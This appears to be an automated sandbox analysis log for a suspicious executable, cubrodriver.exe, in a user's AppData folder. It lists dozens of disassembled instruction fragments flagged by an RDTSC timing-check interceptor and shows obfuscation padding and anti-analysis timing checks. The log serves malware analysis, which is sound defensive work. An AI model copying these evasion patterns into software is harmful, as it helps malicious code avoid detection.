Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 49106AB second address: 491072D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B4D45EE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F01B4D45EDCh 0x00000013 or ch, 00000008h 0x00000016 jmp 00007F01B4D45EDBh 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007F01B4D45EE8h 0x00000022 or ecx, 71957768h 0x00000028 jmp 00007F01B4D45EDBh 0x0000002d popfd 0x0000002e popad 0x0000002f push eax 0x00000030 jmp 00007F01B4D45EE9h 0x00000035 xchg eax, edi 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 491072D second address: 4910731 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4910731 second address: 4910737 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4910737 second address: 49107C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B44E8CA2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub edi, edi 0x0000000b jmp 00007F01B44E8CA1h 0x00000010 test dword ptr [ebp+0Ch], FFFF0000h 0x00000017 pushad 0x00000018 movzx ecx, dx 0x0000001b call 00007F01B44E8CA9h 0x00000020 call 00007F01B44E8CA0h 0x00000025 pop ecx 0x00000026 pop edx 0x00000027 popad 0x00000028 jne 00007F0226B77C72h 0x0000002e jmp 00007F01B44E8C9Eh 0x00000033 mov edx, dword ptr [ebp+0Ch] 0x00000036 jmp 00007F01B44E8CA0h 0x0000003b mov ecx, dword ptr [ebp+08h] 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 49107C7 second address: 49107CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 49107CB second address: 49107CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 49107CF second address: 49107D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 49107D5 second address: 49107E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F01B44E8C9Bh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 49107E4 second address: 491083D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B4D45EE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push 19ADD471h 0x00000010 jmp 00007F01B4D45EE7h 0x00000015 xor dword ptr [esp], 19AD5431h 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F01B4D45EE5h 0x00000023 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 491083D second address: 49108F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B44E8CA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a pushad 0x0000000b call 00007F01B44E8C9Ch 0x00000010 push eax 0x00000011 pop edx 0x00000012 pop ecx 0x00000013 pushfd 0x00000014 jmp 00007F01B44E8CA7h 0x00000019 xor cx, 0B0Eh 0x0000001e jmp 00007F01B44E8CA9h 0x00000023 popfd 0x00000024 popad 0x00000025 push eax 0x00000026 jmp 00007F01B44E8CA1h 0x0000002b xchg eax, edi 0x0000002c pushad 0x0000002d jmp 00007F01B44E8C9Ch 0x00000032 pushfd 0x00000033 jmp 00007F01B44E8CA2h 0x00000038 jmp 00007F01B44E8CA5h 0x0000003d popfd 0x0000003e popad 0x0000003f xchg eax, edi 0x00000040 pushad 0x00000041 mov edi, esi 0x00000043 mov si, BECFh 0x00000047 popad 0x00000048 push eax 0x00000049 pushad 0x0000004a push eax 0x0000004b push edx 0x0000004c mov edi, 18357EF4h 0x00000051 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 491098E second address: 49109D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B4D45EE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a jmp 00007F01B4D45EDEh 0x0000000f retn 0008h 0x00000012 mov dword ptr [ebp-34h], eax 0x00000015 push 00007F01h 0x0000001a push 00000000h 0x0000001c call 00007F01B4D47A82h 0x00000021 jmp 00007F01B9253761h 0x00000026 mov edi, edi 0x00000028 jmp 00007F01B4D45EE0h 0x0000002d xchg eax, ebp 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F01B4D45EDAh 0x00000037 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 49109D6 second address: 49109E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B44E8C9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 49109E5 second address: 4910A09 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B4D45EE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4910A09 second address: 4910A0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4910A0D second address: 4910A13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4910A13 second address: 4910A19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4910A19 second address: 4910A1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4910A1D second address: 4910A2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push ecx 0x0000000f pop ebx 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4910A2E second address: 4910A4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edi 0x00000005 mov eax, ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebp, esp 0x0000000c jmp 00007F01B4D45EDBh 0x00000011 xchg eax, ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 movsx edx, ax 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4910A4F second address: 4910AFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F01B44E8CA9h 0x00000008 pop esi 0x00000009 call 00007F01B44E8CA1h 0x0000000e pop ecx 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 jmp 00007F01B44E8C9Eh 0x00000018 xchg eax, ecx 0x00000019 pushad 0x0000001a call 00007F01B44E8C9Eh 0x0000001f mov cx, 0F61h 0x00000023 pop ecx 0x00000024 pushfd 0x00000025 jmp 00007F01B44E8CA7h 0x0000002a sub cx, 610Eh 0x0000002f jmp 00007F01B44E8CA9h 0x00000034 popfd 0x00000035 popad 0x00000036 xchg eax, edi 0x00000037 jmp 00007F01B44E8C9Eh 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007F01B44E8C9Eh 0x00000044 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4910AFD second address: 4910BDD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F01B4D45EE1h 0x00000008 pop esi 0x00000009 movsx edx, cx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xchg eax, edi 0x00000010 jmp 00007F01B4D45EE8h 0x00000015 sub edi, edi 0x00000017 jmp 00007F01B4D45EE1h 0x0000001c test dword ptr [ebp+0Ch], FFFF0000h 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007F01B4D45EDCh 0x0000002a sbb eax, 237C2EA8h 0x00000030 jmp 00007F01B4D45EDBh 0x00000035 popfd 0x00000036 popad 0x00000037 jne 00007F02273DBF8Ah 0x0000003d pushad 0x0000003e pushfd 0x0000003f jmp 00007F01B4D45EDBh 0x00000044 xor cl, FFFFFFEEh 0x00000047 jmp 00007F01B4D45EE9h 0x0000004c popfd 0x0000004d call 00007F01B4D45EE0h 0x00000052 pushfd 0x00000053 jmp 00007F01B4D45EE2h 0x00000058 or cx, D698h 0x0000005d jmp 00007F01B4D45EDBh 0x00000062 popfd 0x00000063 pop ecx 0x00000064 popad 0x00000065 mov edx, dword ptr [ebp+0Ch] 0x00000068 push eax 0x00000069 push edx 0x0000006a pushad 0x0000006b mov bl, ah 0x0000006d mov bl, D5h 0x0000006f popad 0x00000070 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4910BDD second address: 4910C5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov eax, edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ecx, dword ptr [ebp+08h] 0x0000000d pushad 0x0000000e movsx ebx, si 0x00000011 pushfd 0x00000012 jmp 00007F01B44E8CA4h 0x00000017 adc al, 00000058h 0x0000001a jmp 00007F01B44E8C9Bh 0x0000001f popfd 0x00000020 popad 0x00000021 push 53F878A9h 0x00000026 pushad 0x00000027 movsx edi, si 0x0000002a pushfd 0x0000002b jmp 00007F01B44E8C9Eh 0x00000030 jmp 00007F01B44E8CA5h 0x00000035 popfd 0x00000036 popad 0x00000037 xor dword ptr [esp], 53F8F8E9h 0x0000003e jmp 00007F01B44E8C9Eh 0x00000043 xchg eax, edi 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4910C5D second address: 4910C65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ax, bx 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4910C65 second address: 4910CA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B44E8CA4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F01B44E8C9Ch 0x00000013 or al, FFFFFFA8h 0x00000016 jmp 00007F01B44E8C9Bh 0x0000001b popfd 0x0000001c mov ah, 70h 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4910CA0 second address: 4910CC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B4D45EE2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F01B4D45EDAh 0x00000013 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4910CC5 second address: 4910CD4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B44E8C9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4910CD4 second address: 4910D5D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B4D45EE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007F01B4D45EDEh 0x0000000f push eax 0x00000010 pushad 0x00000011 movsx edx, cx 0x00000014 pushfd 0x00000015 jmp 00007F01B4D45EDAh 0x0000001a sub esi, 03FC93F8h 0x00000020 jmp 00007F01B4D45EDBh 0x00000025 popfd 0x00000026 popad 0x00000027 xchg eax, edi 0x00000028 jmp 00007F01B4D45EE6h 0x0000002d push 00000001h 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 jmp 00007F01B4D45EDDh 0x00000037 jmp 00007F01B4D45EE0h 0x0000003c popad 0x0000003d rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4910DB5 second address: 4910008 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a leave 0x0000000b pushad 0x0000000c mov cl, dl 0x0000000e mov dx, cx 0x00000011 popad 0x00000012 retn 0008h 0x00000015 mov dword ptr [ebp-30h], eax 0x00000018 mov dword ptr [ebp-2Ch], 00000006h 0x0000001f lea eax, dword ptr [ebp-48h] 0x00000022 push eax 0x00000023 call 00007F01B44EA83Bh 0x00000028 jmp 00007F01B89F5B60h 0x0000002d mov edi, edi 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4910008 second address: 491000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 491000C second address: 4910029 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B44E8CA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4910029 second address: 4910039 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F01B4D45EDCh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4910039 second address: 4910047 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4910047 second address: 491004C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 491004C second address: 4910052 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4910052 second address: 4910056 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4910056 second address: 49100AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b jmp 00007F01B44E8CA9h 0x00000010 mov ebp, esp 0x00000012 jmp 00007F01B44E8C9Eh 0x00000017 and esp, FFFFFFF8h 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007F01B44E8C9Dh 0x00000023 jmp 00007F01B44E8C9Bh 0x00000028 popfd 0x00000029 movzx esi, di 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 49100AE second address: 4910116 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B4D45EE2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 30h 0x0000000c pushad 0x0000000d movzx ecx, di 0x00000010 mov al, bh 0x00000012 popad 0x00000013 mov eax, dword ptr [ebp+08h] 0x00000016 jmp 00007F01B4D45EE2h 0x0000001b sub edx, edx 0x0000001d jmp 00007F01B4D45EE1h 0x00000022 xchg eax, esi 0x00000023 jmp 00007F01B4D45EDEh 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F01B4D45EDEh 0x00000030 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4910116 second address: 4910166 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B44E8C9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007F01B44E8CA6h 0x0000000f xchg eax, edi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F01B44E8C9Dh 0x00000019 sub cx, 9546h 0x0000001e jmp 00007F01B44E8CA1h 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4910166 second address: 49101C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F01B4D45EDAh 0x00000009 adc esi, 5E57C1E8h 0x0000000f jmp 00007F01B4D45EDBh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F01B4D45EE2h 0x00000020 and eax, 193A5448h 0x00000026 jmp 00007F01B4D45EDBh 0x0000002b popfd 0x0000002c mov si, 9FBFh 0x00000030 popad 0x00000031 xchg eax, edi 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 mov di, C042h 0x00000039 movsx edi, si 0x0000003c popad 0x0000003d rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 49101C1 second address: 49101C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 49101C7 second address: 49101CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 49101CB second address: 49101F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 00000009h 0x0000000a jmp 00007F01B44E8CA3h 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007F01B44E8C9Bh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 49101F9 second address: 49101FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 49101FE second address: 4910232 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B44E8C9Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea esi, dword ptr [eax+04h] 0x0000000c jmp 00007F01B44E8CA6h 0x00000011 mov eax, dword ptr [eax] 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4910232 second address: 4910236 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4910236 second address: 491023C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 491023C second address: 491024B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F01B4D45EDBh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 491024B second address: 491024F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 491024F second address: 491026B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 00000001h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F01B4D45EE0h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 491026B second address: 49102B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B44E8C9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea edi, dword ptr [esp+14h] 0x0000000d jmp 00007F01B44E8CA6h 0x00000012 rep movsd 0x00000014 rep movsd 0x00000016 rep movsd 0x00000018 rep movsd 0x0000001a rep movsd 0x0000001c rep movsd 0x0000001e rep movsd 0x00000020 rep movsd 0x00000022 rep movsd 0x00000024 jmp 00007F01B44E8CA0h 0x00000029 and dword ptr [esp+38h], 00000000h 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 49102B1 second address: 49102B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 49102B5 second address: 49102BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 49102BB second address: 491036C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B4D45EE4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea ecx, dword ptr [esp+0Ch] 0x0000000d pushad 0x0000000e mov di, ax 0x00000011 push esi 0x00000012 jmp 00007F01B4D45EE9h 0x00000017 pop eax 0x00000018 popad 0x00000019 push D919C6CAh 0x0000001e pushad 0x0000001f call 00007F01B4D45EDAh 0x00000024 pushfd 0x00000025 jmp 00007F01B4D45EE2h 0x0000002a and cx, 8CD8h 0x0000002f jmp 00007F01B4D45EDBh 0x00000034 popfd 0x00000035 pop esi 0x00000036 movsx edx, cx 0x00000039 popad 0x0000003a add dword ptr [esp], 26E639B6h 0x00000041 jmp 00007F01B4D45EE0h 0x00000046 push 00000000h 0x00000048 pushad 0x00000049 mov dx, ax 0x0000004c mov bx, ax 0x0000004f popad 0x00000050 mov dword ptr [esp+18h], eax 0x00000054 push eax 0x00000055 push edx 0x00000056 pushad 0x00000057 call 00007F01B4D45EE1h 0x0000005c pop ecx 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 491036C second address: 4910371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4910371 second address: 4910377 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 491043B second address: 4910458 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B44E8CA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4910458 second address: 4930016 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F01B4D45EE7h 0x00000009 adc esi, 1E26929Eh 0x0000000f jmp 00007F01B4D45EE9h 0x00000014 popfd 0x00000015 push eax 0x00000016 pop ebx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pop ebp 0x0000001b pushad 0x0000001c push ecx 0x0000001d pushad 0x0000001e popad 0x0000001f pop ebx 0x00000020 pushfd 0x00000021 jmp 00007F01B4D45EE2h 0x00000026 and eax, 4D9E23C8h 0x0000002c jmp 00007F01B4D45EDBh 0x00000031 popfd 0x00000032 popad 0x00000033 retn 0004h 0x00000036 push 00000000h 0x00000038 push dword ptr [ebp-04h] 0x0000003b push 00000000h 0x0000003d push 00000000h 0x0000003f push 00000096h 0x00000044 push 000001F4h 0x00000049 push FFFFFC18h 0x0000004e push FFFFFC18h 0x00000053 push 00C80000h 0x00000058 lea eax, dword ptr [ebp-0000014Ch] 0x0000005e push eax 0x0000005f lea eax, dword ptr [ebp-0000024Ch] 0x00000065 push eax 0x00000066 push 00000080h 0x0000006b call 00007F01B4D47A0Bh 0x00000070 jmp 00007F01B9272DD6h 0x00000075 mov edi, edi 0x00000077 push eax 0x00000078 push edx 0x00000079 push eax 0x0000007a push edx 0x0000007b jmp 00007F01B4D45EE0h 0x00000080 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4930016 second address: 493001C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 493001C second address: 493006A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F01B4D45EDCh 0x00000009 sbb esi, 4308C948h 0x0000000f jmp 00007F01B4D45EDBh 0x00000014 popfd 0x00000015 call 00007F01B4D45EE8h 0x0000001a pop esi 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e push esp 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F01B4D45EDDh 0x00000026 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 493006A second address: 493006F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
